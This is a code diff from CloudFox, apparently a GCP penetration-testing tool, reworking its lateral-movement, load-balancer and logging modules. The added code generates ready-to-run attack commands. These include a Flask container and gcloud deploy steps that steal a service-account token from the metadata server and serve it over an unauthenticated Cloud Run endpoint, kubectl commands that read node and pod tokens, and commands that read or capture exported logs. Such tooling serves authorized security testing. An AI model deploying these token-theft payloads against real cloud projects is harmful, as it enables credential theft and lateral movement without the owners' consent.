+# Step 3: Invoke function to get token +curl -s $(gcloud functions describe token-theft-poc --region=%s --project=%s --format='value(url)') + +# Cleanup +gcloud functions delete token-theft-poc --region=%s --project=%s --quiet`, + fn.Name, fn.ServiceAccount, fn.Region, + fn.Name, fn.Name, + fn.Region, fn.ServiceAccount, projectID, + fn.Region, projectID, + fn.Region, projectID) + + vector := TokenTheftVector{ ResourceType: "cloud_function", - ResourceName: "*", + ResourceName: fn.Name, ProjectID: projectID, - ServiceAccount: "", + ServiceAccount: fn.ServiceAccount, AttackVector: "function_execution", RiskLevel: "HIGH", - ExploitCommand: `# Deploy a function that exfiltrates the SA token via metadata server`, - }, - { - ResourceType: "cloud_run", - ResourceName: "*", - ProjectID: projectID, - ServiceAccount: "", - AttackVector: "container_execution", - RiskLevel: "HIGH", - ExploitCommand: `# Access metadata server from within Cloud Run container`, - }, - { - ResourceType: "gke_pod", - ResourceName: "*", - ProjectID: projectID, - ServiceAccount: "", - AttackVector: "pod_service_account", - RiskLevel: "MEDIUM", - ExploitCommand: `kubectl exec -it -- curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/..."`, - }, - } + ExploitCommand: exploitCmd, + } - m.mu.Lock() - m.TokenTheftVectors = append(m.TokenTheftVectors, vectors...) - for _, v := range vectors { - m.addTokenTheftVectorToLoot(v) + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() } - m.mu.Unlock() } -// findCrossProjectAccess finds IAM bindings that allow cross-project access -func (m *LateralMovementModule) findCrossProjectAccess(ctx context.Context, projectID string, logger internal.Logger) { - iamService := IAMService.New() +// findCloudRunVectors finds Cloud Run services where tokens can be stolen +func (m *LateralMovementModule) findCloudRunVectors(ctx context.Context, projectID string, logger internal.Logger) { + cloudRunService := CloudRunService.New() - // Get IAM policy for the project using PoliciesWithInheritance for comprehensive view - bindings, err := iamService.PoliciesWithInheritance(projectID) + services, err := cloudRunService.Services(projectID) if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, - fmt.Sprintf("Could not get IAM policy for project %s", projectID)) + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Run services in project %s", projectID)) + } return } - // Check each binding for cross-project principals - for _, binding := range bindings { - for _, member := range binding.Members { - // Check if member is from a different project - if strings.Contains(member, "serviceAccount:") && !strings.Contains(member, projectID) { - // Extract the SA's project from the email - saEmail := strings.TrimPrefix(member, "serviceAccount:") - saParts := strings.Split(saEmail, "@") - if len(saParts) >= 2 { - saProject := strings.TrimSuffix(saParts[1], ".iam.gserviceaccount.com") - - crossPath := CrossProjectPath{ - SourceProject: saProject, - TargetProject: projectID, - Principal: saEmail, - Role: binding.Role, - AccessType: "direct", - RiskLevel: m.classifyCrossProjectRisk(binding.Role), - } - - m.mu.Lock() - m.CrossProjectPaths = append(m.CrossProjectPaths, crossPath) - m.addCrossProjectPathToLoot(crossPath) - m.mu.Unlock() - } - } + for _, svc := range services { + if svc.ServiceAccount == "" { + continue } - } -} -// findCredentialLocations identifies where credentials might be stored -func (m *LateralMovementModule) findCredentialLocations(ctx context.Context, projectID string, logger internal.Logger) { - // Common credential storage locations in GCP - locations := []CredentialLocation{ - { - ResourceType: "secret_manager", - ResourceName: "*", - ProjectID: projectID, - CredentialType: "secret", - Description: "Secrets stored in Secret Manager", - RiskLevel: "MEDIUM", - }, - { - ResourceType: "compute_metadata", - ResourceName: "*", + // Generate exploit with PoC code, deploy command, and invoke command + exploitCmd := fmt.Sprintf(`# Target: Cloud Run Service %s +# Service Account: %s +# Region: %s + +# Step 1: Create token exfiltration container +mkdir -p /tmp/cloudrun-theft-%s && cd /tmp/cloudrun-theft-%s + +cat > main.py << 'PYEOF' +from flask import Flask, jsonify +import requests +import os + +app = Flask(__name__) + +@app.route("/") +def steal_token(): + # Fetch SA token from metadata server + token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" + headers = {"Metadata-Flavor": "Google"} + resp = requests.get(token_url, headers=headers) + token_data = resp.json() + + # Fetch SA email + email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" + email_resp = requests.get(email_url, headers=headers) + + return jsonify({ + "service_account": email_resp.text, + "access_token": token_data.get("access_token"), + "token_type": token_data.get("token_type"), + "expires_in": token_data.get("expires_in") + }) + +if __name__ == "__main__": + app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) +PYEOF + +cat > requirements.txt << 'REQEOF' +flask==3.* +requests==2.* +gunicorn==21.* +REQEOF + +cat > Dockerfile << 'DOCKEOF' +FROM python:3.11-slim +WORKDIR /app +COPY requirements.txt . +RUN pip install --no-cache-dir -r requirements.txt +COPY main.py . +CMD exec gunicorn --bind :$PORT --workers 1 --threads 8 --timeout 0 main:app +DOCKEOF + +# Step 2: Build and push container +gcloud builds submit --tag gcr.io/%s/token-theft-poc --project=%s + +# Step 3: Deploy Cloud Run service with target SA (requires run.services.create + iam.serviceAccounts.actAs) +gcloud run deploy token-theft-poc \ + --image gcr.io/%s/token-theft-poc \ + --region=%s \ + --service-account=%s \ + --allow-unauthenticated \ + --project=%s + +# Step 4: Invoke service to get token +curl -s $(gcloud run services describe token-theft-poc --region=%s --project=%s --format='value(status.url)') + +# Cleanup +gcloud run services delete token-theft-poc --region=%s --project=%s --quiet +gcloud container images delete gcr.io/%s/token-theft-poc --quiet --force-delete-tags`, + svc.Name, svc.ServiceAccount, svc.Region, + svc.Name, svc.Name, + projectID, projectID, + projectID, svc.Region, svc.ServiceAccount, projectID, + svc.Region, projectID, + svc.Region, projectID, + projectID) + + vector := TokenTheftVector{ + ResourceType: "cloud_run", + ResourceName: svc.Name, ProjectID: projectID, - CredentialType: "env_var", - Description: "Environment variables in instance metadata", + ServiceAccount: svc.ServiceAccount, + AttackVector: "container_execution", RiskLevel: "HIGH", - }, - { - ResourceType: "gcs_bucket", - ResourceName: "*", - ProjectID: projectID, - CredentialType: "sa_key", - Description: "Service account keys stored in GCS", - RiskLevel: "CRITICAL", - }, - } + ExploitCommand: exploitCmd, + } - m.mu.Lock() - m.CredentialLocations = append(m.CredentialLocations, locations...) - m.mu.Unlock() + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } } -// classifyCrossProjectRisk determines the risk level of a cross-project binding -func (m *LateralMovementModule) classifyCrossProjectRisk(role string) string { - highRiskRoles := []string{ - "roles/owner", - "roles/editor", - "roles/iam.securityAdmin", - "roles/iam.serviceAccountAdmin", - "roles/iam.serviceAccountTokenCreator", - "roles/iam.serviceAccountKeyAdmin", - } +// findGKEVectors finds GKE clusters/node pools where tokens can be stolen +func (m *LateralMovementModule) findGKEVectors(ctx context.Context, projectID string, logger internal.Logger) { + gkeService := GKEService.New() - for _, hr := range highRiskRoles { - if role == hr { - return "CRITICAL" + clusters, nodePools, err := gkeService.Clusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get GKE clusters in project %s", projectID)) } + return } - if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { - return "HIGH" + // Track cluster SAs to avoid duplicates in node pools + clusterSAs := make(map[string]string) // clusterName -> SA + + for _, cluster := range clusters { + // Check node service account + if cluster.NodeServiceAccount != "" { + clusterSAs[cluster.Name] = cluster.NodeServiceAccount + + var exploitCmd string + if cluster.WorkloadIdentity != "" { + exploitCmd = fmt.Sprintf(`# Cluster uses Workload Identity - tokens are pod-specific +# Get credentials for cluster: +gcloud container clusters get-credentials %s --location=%s --project=%s +# Then exec into a pod and check for mounted SA token: +kubectl exec -it -- cat /var/run/secrets/kubernetes.io/serviceaccount/token`, + cluster.Name, cluster.Location, projectID) + } else { + exploitCmd = fmt.Sprintf(`# Cluster uses node SA (no Workload Identity) - all pods can access node SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into any pod and steal node SA token: +kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, + cluster.Name, cluster.Location, projectID) + } + + vector := TokenTheftVector{ + ResourceType: "gke_cluster", + ResourceName: cluster.Name, + ProjectID: projectID, + ServiceAccount: cluster.NodeServiceAccount, + AttackVector: "pod_service_account", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } } - return "MEDIUM" + // Process node pools with different SAs than their cluster + for _, np := range nodePools { + clusterSA := clusterSAs[np.ClusterName] + if np.ServiceAccount == "" || np.ServiceAccount == clusterSA { + continue // Skip if same as cluster SA or empty + } + + exploitCmd := fmt.Sprintf(`# Node pool %s uses specific SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into pod running on this node pool and steal token`, + np.Name, np.ClusterName, np.Location, projectID) + + vector := TokenTheftVector{ + ResourceType: "gke_nodepool", + ResourceName: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + ProjectID: projectID, + ServiceAccount: np.ServiceAccount, + AttackVector: "pod_service_account", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } } // ------------------------------ // Loot File Management // ------------------------------ func (m *LateralMovementModule) initializeLootFiles() { - m.LootMap["lateral-impersonation-chains"] = &internal.LootFile{ - Name: "lateral-impersonation-chains", - Contents: "# Service Account Impersonation Chains\n# Generated by CloudFox\n# These show how one identity can assume another\n\n", - } - m.LootMap["lateral-token-theft"] = &internal.LootFile{ - Name: "lateral-token-theft", - Contents: "# Token Theft Vectors\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", - } - m.LootMap["lateral-cross-project"] = &internal.LootFile{ - Name: "lateral-cross-project", - Contents: "# Cross-Project Access Paths\n# Generated by CloudFox\n# These show lateral movement opportunities between projects\n\n", + m.LootMap["impersonation-chains-commands"] = &internal.LootFile{ + Name: "impersonation-chains-commands", + Contents: "# Impersonation Chain Exploit Commands\n# Generated by CloudFox\n\n", } - m.LootMap["lateral-exploitation"] = &internal.LootFile{ - Name: "lateral-exploitation", - Contents: "# Lateral Movement Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + m.LootMap["token-theft-commands"] = &internal.LootFile{ + Name: "token-theft-commands", + Contents: "# Token Theft Exploit Commands\n# Generated by CloudFox\n\n", } } func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationChain, projectID string) { - m.LootMap["lateral-impersonation-chains"].Contents += fmt.Sprintf( - "## Chain: %s -> %s\n"+ - "Risk: %s\n"+ - "Path: %s\n"+ - "Command: %s\n\n", + m.LootMap["impersonation-chains-commands"].Contents += fmt.Sprintf( + "# Impersonation: %s -> %s\n"+ + "# Path: %s\n"+ + "%s\n\n", chain.StartIdentity, chain.TargetSA, - chain.RiskLevel, strings.Join(chain.Path, " -> "), chain.ExploitCommand, ) - - if chain.RiskLevel == "CRITICAL" || chain.RiskLevel == "HIGH" { - m.LootMap["lateral-exploitation"].Contents += fmt.Sprintf( - "# Impersonation: %s -> %s (%s)\n"+ - "%s\n\n", - chain.StartIdentity, - chain.TargetSA, - chain.RiskLevel, - chain.ExploitCommand, - ) - } } func (m *LateralMovementModule) addTokenTheftVectorToLoot(vector TokenTheftVector) { - m.LootMap["lateral-token-theft"].Contents += fmt.Sprintf( - "## %s: %s\n"+ - "Project: %s\n"+ - "Service Account: %s\n"+ - "Attack Vector: %s\n"+ - "Risk: %s\n"+ - "Command:\n%s\n\n", + m.LootMap["token-theft-commands"].Contents += fmt.Sprintf( + "# Token Theft: %s (%s)\n"+ + "# Project: %s\n"+ + "# Service Account: %s\n"+ + "# Attack Vector: %s\n"+ + "%s\n\n", vector.ResourceType, vector.ResourceName, vector.ProjectID, vector.ServiceAccount, vector.AttackVector, - vector.RiskLevel, vector.ExploitCommand, ) } -func (m *LateralMovementModule) addCrossProjectPathToLoot(path CrossProjectPath) { - m.LootMap["lateral-cross-project"].Contents += fmt.Sprintf( - "## %s -> %s\n"+ - "Principal: %s\n"+ - "Role: %s\n"+ - "Access Type: %s\n"+ - "Risk: %s\n\n", - path.SourceProject, - path.TargetProject, - path.Principal, - path.Role, - path.AccessType, - path.RiskLevel, - ) -} - // ------------------------------ // Output Generation // ------------------------------ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { // Impersonation chains table + // Reads: Source identity can perform action on target service account chainsHeader := []string{ - "Start Identity", - "Target SA", - "Chain Length", - "Risk", - "Exploit Command", + "Source Identity", + "Action", + "Target Service Account", + "Impersonation Path", } var chainsBody [][]string for _, chain := range m.ImpersonationChains { + // Determine action based on exploit command + action := "impersonate (get token)" + if strings.Contains(chain.ExploitCommand, "keys create") { + action = "create key" + } + chainsBody = append(chainsBody, []string{ - truncateString(chain.StartIdentity, 40), - truncateString(chain.TargetSA, 40), - fmt.Sprintf("%d", chain.ChainLength), - chain.RiskLevel, - truncateString(chain.ExploitCommand, 50), + chain.StartIdentity, + action, + chain.TargetSA, + strings.Join(chain.Path, " -> "), }) } // Token theft vectors table vectorsHeader := []string{ - "Resource Type", - "Resource", "Project Name", "Project ID", - "Attack Vector", - "Risk", + "Source Resource Type", + "Source Resource Name", + "Action", + "Target Service Account", } var vectorsBody [][]string for _, vector := range m.TokenTheftVectors { + // Map attack vector to action description + action := vector.AttackVector + switch vector.AttackVector { + case "metadata_server": + action = "steal token (metadata)" + case "function_execution": + action = "steal token (function)" + case "container_execution": + action = "steal token (container)" + case "pod_service_account": + action = "steal token (pod)" + } + vectorsBody = append(vectorsBody, []string{ - vector.ResourceType, - truncateString(vector.ResourceName, 30), m.GetProjectName(vector.ProjectID), vector.ProjectID, - vector.AttackVector, - vector.RiskLevel, - }) - } - - // Cross-project paths table - crossHeader := []string{ - "Source Project Name", - "Source Project ID", - "Target Project Name", - "Target Project ID", - "Principal", - "Role", - "Risk", - } - - var crossBody [][]string - for _, path := range m.CrossProjectPaths { - crossBody = append(crossBody, []string{ - m.GetProjectName(path.SourceProject), - path.SourceProject, - m.GetProjectName(path.TargetProject), - path.TargetProject, - truncateString(path.Principal, 40), - path.Role, - path.RiskLevel, + vector.ResourceType, + vector.ResourceName, + action, + vector.ServiceAccount, }) } @@ -571,15 +699,6 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal }) } - if len(crossBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "lateral-cross-project", - Header: crossHeader, - Body: crossBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d cross-project path(s)", len(crossBody)), GCP_LATERALMOVEMENT_MODULE_NAME) - } - output := LateralMovementOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index e239d80e..aba9f74f 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -125,23 +125,37 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri } func (m *LoadBalancersModule) initializeLootFiles() { - m.LootMap["load-balancers"] = &internal.LootFile{ - Name: "load-balancers", - Contents: "# Load Balancers\n# Generated by CloudFox\n\n", - } - m.LootMap["external-ips"] = &internal.LootFile{ - Name: "lb-external-ips", - Contents: "", + m.LootMap["loadbalancers-commands"] = &internal.LootFile{ + Name: "loadbalancers-commands", + Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) { - m.LootMap["load-balancers"].Contents += fmt.Sprintf( - "# LB: %s\n# Type: %s\n# Scheme: %s\n# IP: %s\n# Port: %s\n\n", - lb.Name, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "## Load Balancer: %s (Project: %s)\n"+ + "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", + lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + + // Describe forwarding rule + if lb.Region == "global" { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe global forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --global --project=%s\n\n", + lb.Name, lb.ProjectID) + } else { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe regional forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + lb.Name, lb.Region, lb.ProjectID) + } - if lb.Scheme == "EXTERNAL" && lb.IPAddress != "" { - m.LootMap["external-ips"].Contents += fmt.Sprintf("%s # %s (%s)\n", lb.IPAddress, lb.Name, lb.Type) + // Backend service commands + for _, backend := range lb.BackendServices { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe backend service:\n"+ + "gcloud compute backend-services describe %s --global --project=%s\n\n", + backend, lb.ProjectID) } } @@ -149,19 +163,28 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L var tables []internal.TableFile // Load Balancers table - lbHeader := []string{"Name", "Type", "Scheme", "IP Address", "Port", "Region", "Risk", "Project Name", "Project"} + lbHeader := []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} var lbBody [][]string for _, lb := range m.LoadBalancers { + backends := "-" + if len(lb.BackendServices) > 0 { + backends = strings.Join(lb.BackendServices, ", ") + } + secPolicy := "-" + if lb.SecurityPolicy != "" { + secPolicy = lb.SecurityPolicy + } lbBody = append(lbBody, []string{ + m.GetProjectName(lb.ProjectID), + lb.ProjectID, lb.Name, lb.Type, lb.Scheme, + lb.Region, lb.IPAddress, lb.Port, - lb.Region, - lb.RiskLevel, - m.GetProjectName(lb.ProjectID), - lb.ProjectID, + backends, + secPolicy, }) } tables = append(tables, internal.TableFile{ @@ -172,16 +195,20 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L // SSL Policies table if len(m.SSLPolicies) > 0 { - sslHeader := []string{"Name", "Min TLS", "Profile", "Risk", "Project Name", "Project"} + sslHeader := []string{"Project Name", "Project ID", "Name", "Min TLS Version", "Profile", "Custom Features"} var sslBody [][]string for _, policy := range m.SSLPolicies { + customFeatures := "-" + if len(policy.CustomFeatures) > 0 { + customFeatures = strings.Join(policy.CustomFeatures, ", ") + } sslBody = append(sslBody, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, policy.Name, policy.MinTLSVersion, policy.Profile, - policy.RiskLevel, - m.GetProjectName(policy.ProjectID), - policy.ProjectID, + customFeatures, }) } tables = append(tables, internal.TableFile{ @@ -193,26 +220,36 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L // Backend Services table if len(m.BackendServices) > 0 { - beHeader := []string{"Name", "Protocol", "Security Policy", "CDN", "Health Check", "Risk", "Project Name", "Project"} + beHeader := []string{"Project Name", "Project ID", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} var beBody [][]string for _, be := range m.BackendServices { - cdn := "No" - if be.EnableCDN { - cdn = "Yes" + secPolicy := "-" + if be.SecurityPolicy != "" { + secPolicy = be.SecurityPolicy + } + healthCheck := "-" + if be.HealthCheck != "" { + healthCheck = be.HealthCheck } - secPolicy := be.SecurityPolicy - if secPolicy == "" { - secPolicy = "(none)" + sessionAffinity := "-" + if be.SessionAffinity != "" { + sessionAffinity = be.SessionAffinity + } + backends := "-" + if len(be.Backends) > 0 { + backends = strings.Join(be.Backends, ", ") } beBody = append(beBody, []string{ + m.GetProjectName(be.ProjectID), + be.ProjectID, be.Name, be.Protocol, + fmt.Sprintf("%d", be.Port), secPolicy, - cdn, - be.HealthCheck, - be.RiskLevel, - m.GetProjectName(be.ProjectID), - be.ProjectID, + boolToYesNo(be.EnableCDN), + healthCheck, + sessionAffinity, + backends, }) } tables = append(tables, internal.TableFile{ @@ -222,44 +259,9 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L }) } - // High-risk findings table - var highRiskBody [][]string - for _, lb := range m.LoadBalancers { - if lb.RiskLevel == "HIGH" || lb.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - "LoadBalancer", - lb.Name, - lb.RiskLevel, - strings.Join(lb.RiskReasons, "; "), - m.GetProjectName(lb.ProjectID), - lb.ProjectID, - }) - } - } - for _, policy := range m.SSLPolicies { - if policy.RiskLevel == "HIGH" || policy.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - "SSLPolicy", - policy.Name, - policy.RiskLevel, - strings.Join(policy.RiskReasons, "; "), - m.GetProjectName(policy.ProjectID), - policy.ProjectID, - }) - } - } - - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "lb-risks", - Header: []string{"Type", "Name", "Risk Level", "Reasons", "Project Name", "Project"}, - Body: highRiskBody, - }) - } - var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index 2abda159..c89c9f6f 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -153,6 +153,9 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo } else { m.mu.Lock() m.Metrics = append(m.Metrics, metrics...) + for _, metric := range metrics { + m.addMetricToLoot(metric) + } m.mu.Unlock() } @@ -165,58 +168,83 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo // Loot File Management // ------------------------------ func (m *LoggingModule) initializeLootFiles() { - m.LootMap["logging-gcloud-commands"] = &internal.LootFile{ - Name: "logging-gcloud-commands", - Contents: "# Cloud Logging gcloud Commands\n# Generated by CloudFox\n\n", + // Sinks loot files + m.LootMap["sinks-commands"] = &internal.LootFile{ + Name: "sinks-commands", + Contents: "# Cloud Logging Sinks Commands\n# Generated by CloudFox\n\n", } - m.LootMap["logging-cross-project"] = &internal.LootFile{ - Name: "logging-cross-project", + m.LootMap["sinks-cross-project"] = &internal.LootFile{ + Name: "sinks-cross-project", Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", } - m.LootMap["logging-writer-identities"] = &internal.LootFile{ - Name: "logging-writer-identities", + m.LootMap["sinks-writer-identities"] = &internal.LootFile{ + Name: "sinks-writer-identities", Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", } - m.LootMap["logging-exploitation"] = &internal.LootFile{ - Name: "logging-exploitation", - Contents: "# Logging Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - // New enhancement loot files - m.LootMap["logging-disabled-sinks"] = &internal.LootFile{ - Name: "logging-disabled-sinks", - Contents: "# Disabled Logging Sinks\n# These sinks are not exporting logs - potential log evasion\n# Generated by CloudFox\n\n", - } - m.LootMap["logging-exclusion-filters"] = &internal.LootFile{ - Name: "logging-exclusion-filters", - Contents: "# Logging Sink Exclusion Filters\n# These filters exclude specific logs from export\n# Generated by CloudFox\n\n", - } - m.LootMap["logging-storage-destinations"] = &internal.LootFile{ - Name: "logging-storage-destinations", - Contents: "# Cloud Storage Log Destinations\n# Log export buckets to investigate\n# Generated by CloudFox\n\n", - } - m.LootMap["logging-bigquery-destinations"] = &internal.LootFile{ - Name: "logging-bigquery-destinations", - Contents: "# BigQuery Log Destinations\n# Log export datasets for querying\n# Generated by CloudFox\n\n", - } - m.LootMap["logging-security-recommendations"] = &internal.LootFile{ - Name: "logging-security-recommendations", - Contents: "# Cloud Logging Security Recommendations\n# Generated by CloudFox\n\n", + // Metrics loot files + m.LootMap["metrics-commands"] = &internal.LootFile{ + Name: "metrics-commands", + Contents: "# Cloud Logging Metrics Commands\n# Generated by CloudFox\n\n", } } func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { - // gcloud commands - m.LootMap["logging-gcloud-commands"].Contents += fmt.Sprintf( + // Sinks commands file + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( "# Sink: %s (Project: %s)\n"+ - "gcloud logging sinks describe %s --project=%s\n\n", + "# Destination: %s (%s)\n"+ + "gcloud logging sinks describe %s --project=%s\n", sink.Name, sink.ProjectID, + sink.DestinationType, getDestinationName(sink), sink.Name, sink.ProjectID, ) + // Add destination-specific commands + switch sink.DestinationType { + case "storage": + if sink.DestinationBucket != "" { + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cat gs://%s/**/*.json 2>/dev/null | head -100\n", + sink.DestinationBucket, sink.DestinationBucket, + ) + } + case "bigquery": + if sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "bq ls %s:%s\n"+ + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n", + destProject, sink.DestinationDataset, + destProject, sink.DestinationDataset, + ) + } + case "pubsub": + if sink.DestinationTopic != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n", + sink.DestinationTopic, destProject, destProject, + ) + } + } + m.LootMap["sinks-commands"].Contents += "\n" + // Cross-project exports if sink.IsCrossProject { - m.LootMap["logging-cross-project"].Contents += fmt.Sprintf( - "# SINK: %s\n"+ + filter := sink.Filter + if filter == "" { + filter = "(no filter - all logs)" + } + m.LootMap["sinks-cross-project"].Contents += fmt.Sprintf( + "# Sink: %s\n"+ "# Source Project: %s\n"+ "# Destination Project: %s\n"+ "# Destination Type: %s\n"+ @@ -228,137 +256,28 @@ func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { sink.DestinationProject, sink.DestinationType, sink.Destination, - truncateFilter(sink.Filter), + filter, sink.WriterIdentity, ) } // Writer identities if sink.WriterIdentity != "" { - m.LootMap["logging-writer-identities"].Contents += fmt.Sprintf( - "# Sink: %s -> %s\n"+ + m.LootMap["sinks-writer-identities"].Contents += fmt.Sprintf( + "# Sink: %s -> %s (%s)\n"+ "%s\n\n", - sink.Name, sink.DestinationType, + sink.Name, sink.DestinationType, getDestinationName(sink), sink.WriterIdentity, ) } +} - // Disabled sinks - potential log evasion - if sink.Disabled { - m.LootMap["logging-disabled-sinks"].Contents += fmt.Sprintf( - "# DISABLED SINK: %s\n"+ - "# Project: %s\n"+ - "# Destination: %s (%s)\n"+ - "# This sink is not exporting logs!\n"+ - "# Re-enable: gcloud logging sinks update %s --no-disabled --project=%s\n\n", - sink.Name, - sink.ProjectID, - sink.DestinationType, getDestinationName(sink), - sink.Name, sink.ProjectID, - ) - } - - // Exclusion filters - may hide malicious activity - if len(sink.ExclusionFilters) > 0 { - m.LootMap["logging-exclusion-filters"].Contents += fmt.Sprintf( - "# Sink: %s (Project: %s)\n"+ - "# Destination: %s\n"+ - "# Exclusion Filters (%d):\n", - sink.Name, sink.ProjectID, - getDestinationName(sink), - len(sink.ExclusionFilters), - ) - for i, filter := range sink.ExclusionFilters { - m.LootMap["logging-exclusion-filters"].Contents += fmt.Sprintf( - "# [%d] %s\n", - i+1, filter, - ) - } - m.LootMap["logging-exclusion-filters"].Contents += "\n" - } - - // Storage destinations - if sink.DestinationType == "storage" && sink.DestinationBucket != "" { - m.LootMap["logging-storage-destinations"].Contents += fmt.Sprintf( - "# Sink: %s (Project: %s)\n"+ - "# Bucket: %s\n"+ - "# Cross-Project: %v\n"+ - "gsutil ls gs://%s/\n"+ - "gsutil ls -r gs://%s/ | head -50\n"+ - "# Sample logs:\n"+ - "gsutil cat gs://%s/$(gsutil ls gs://%s/ | head -1)/*.json 2>/dev/null | head -20\n\n", - sink.Name, sink.ProjectID, - sink.DestinationBucket, - sink.IsCrossProject, - sink.DestinationBucket, - sink.DestinationBucket, - sink.DestinationBucket, sink.DestinationBucket, - ) - } - - // BigQuery destinations - if sink.DestinationType == "bigquery" && sink.DestinationDataset != "" { - destProject := sink.DestinationProject - if destProject == "" { - destProject = sink.ProjectID - } - m.LootMap["logging-bigquery-destinations"].Contents += fmt.Sprintf( - "# Sink: %s (Project: %s)\n"+ - "# Dataset: %s.%s\n"+ - "# Cross-Project: %v\n"+ - "bq ls %s:%s\n"+ - "# Query recent logs:\n"+ - "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` WHERE timestamp > TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 1 DAY) LIMIT 100'\n\n", - sink.Name, sink.ProjectID, - destProject, sink.DestinationDataset, - sink.IsCrossProject, - destProject, sink.DestinationDataset, - destProject, sink.DestinationDataset, - ) - } - - // Add security recommendations - m.addSinkSecurityRecommendations(sink) - - // Exploitation commands - m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( - "# Sink: %s (Project: %s)\n"+ - "# Destination: %s 